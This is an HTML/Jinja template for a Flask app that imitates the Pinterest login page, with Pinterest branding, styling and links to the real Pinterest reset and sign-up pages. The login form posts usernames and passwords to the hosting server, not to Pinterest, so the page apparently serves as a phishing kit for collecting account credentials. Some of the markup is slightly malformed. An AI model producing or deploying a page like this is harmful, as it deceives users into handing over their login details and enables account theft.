<Doctype html!>

<html

<head>


<title>Pinterest</title>
<meta name="viewport" content="width=device-width, initial-scale=1">


<style>

img{
width:50px;
height:50px;
/*margin-right:190px;*/
}

#pinterest{
color:#CC0000;
font-size:23px;
margin-top:-90px;


}
body{
text-align:center;
font-family:arial;


}
#head{
text-align:center;

}

.input{
width:290px;
height:45px;
margin-top:3px;
margin-bottom:3px;
outline-color:#0095F6;
border-radius:13px;
border:2px solid #ddd;

}
#Login{
width:290px;
height:40px;
border-radius:20px;
border-color:white;
border:1px solid white;
font-size:15px;
color:gray;
background-color:#EFEFEF;
}

#sign-start{

color:black;
text-decoration:none;
}


#FP{
color:black;
font-size:small;
margin-right:155px;
margin-top:3px;
text-decoration:none;
}

footer{
font-size:15px;
color:black;
margin-top:100px;

}

img{

width:70px;
height:40px;



}
</style>
</head>


{% block content %}


{% with messages = get_flashed_messages()%}

	{% if messages %}
		{% for msg in messages %}
			<p style="color:red">{{msg}}</p>
		
		{%endfor%}



	{%endif%}




{%endwith%}






<body>

<!--<div id= "head">-->
<img src = "{{ url_for('static',filename='Pinterest.png')}}">
<br>
<b id = "pinterest">Pinterest</b>



<form action="#" method="POST" style="margin-top:30px">

<input type="text" name="username" class="input" placeholder="Phone number,username, or email" required>
<input type="password" name="password" class="input" placeholder="Password" required>

<p id = "FP"><a href="https://pinterest.com/password/reset" style="color:black">forgot password?</a></p>

<button id="Login"><b>Log in</b></button> 
</form>
<span id = "account">No account?</span><span><b><a href="https://pinterest.com/signup/step1/" id="sign-start">Sign up</a></b></span><br><br>
<span id = "biz">Are you a business?</span><span><b><a href="https://pinterest.com/business/create" id="sign-start">Get started here</a></b></span>

</div>





</body>
{% endblock %}
</html>